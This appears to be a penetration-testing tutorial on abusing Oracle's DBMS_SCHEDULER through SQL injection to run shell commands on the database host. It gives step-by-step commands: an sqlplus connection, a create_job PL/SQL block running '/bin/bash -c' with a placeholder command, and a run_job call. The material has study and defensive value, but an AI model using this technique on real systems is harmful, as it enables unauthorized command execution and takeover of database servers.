DBMS_SCHEDULER Jobs

Context

This article is intended to guide you through exploiting Oracle's DBMS_SCHEDULER to execute external commands via SQL injection. This technique allows an attacker to compromise an Oracle database by executing shell commands, potentially taking control of the underlying operating system. A solid understanding of Oracle DBMS_SCHEDULER and Oracle SQL is assumed.

Theory

DBMS_SCHEDULER.create_job Functionality

The DBMS_SCHEDULER package provides the ability to schedule and execute jobs within Oracle databases. This feature enables database administrators to automate routine tasks by running PL/SQL code or external scripts. However, if not properly secured, this functionality can be misused to create jobs that execute arbitrary commands, posing a significant security risk.

External Job Execution Risks

DBMS_SCHEDULER can be configured to run jobs that execute commands at the operating system level. This capability introduces security risks, especially when external jobs are configured incorrectly. Through SQL injection, malicious actors can create or modify jobs to run unauthorized commands, potentially leading to full system compromise.

Oracle SQL Injection Exploitation

SQL injection provides a pathway to manipulate DBMS_SCHEDULER for executing external commands. Attackers can inject SQL code that creates or modifies jobs without proper authorization. Bypassing input validation mechanisms is a crucial step in successfully injecting malicious SQL payloads.

Practice

Exploiting DBMS_SCHEDULER to Execute External Commands

To exploit DBMS_SCHEDULER for executing external commands, follow these steps:

  1. Connect to the Oracle Database

    Use SQL*Plus to establish a connection to the Oracle database.

    sqlplus 'username/password@//host:port/service_name'

  2. Inject SQL to Create a Malicious Job

    Inject a SQL payload to create a new job that runs a shell command. This payload utilizes the DBMS_SCHEDULER.create_job procedure.

    BEGIN 
    DBMS_SCHEDULER.create_job(
        job_name => 'malicious_job',
        job_type => 'EXECUTABLE',
        job_action => '/bin/bash -c "<malicious_command>"',
        enabled => TRUE
    ); 
END;

    This command creates a job named malicious_job that, when executed, runs the specified shell command on the system.

  3. Execute the Created Job

    Run the job you've created with the following SQL command:

    EXEC DBMS_SCHEDULER.run_job('malicious_job');

    This command forces the scheduler to execute the job immediately, thereby executing your arbitrary command on the host system.

The successful execution of these steps results in arbitrary command execution on the host system, potentially giving the attacker control over the database server.

Tools

  • sqlplus: A command-line tool used to connect to Oracle databases, enabling SQL execution and database manipulation.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.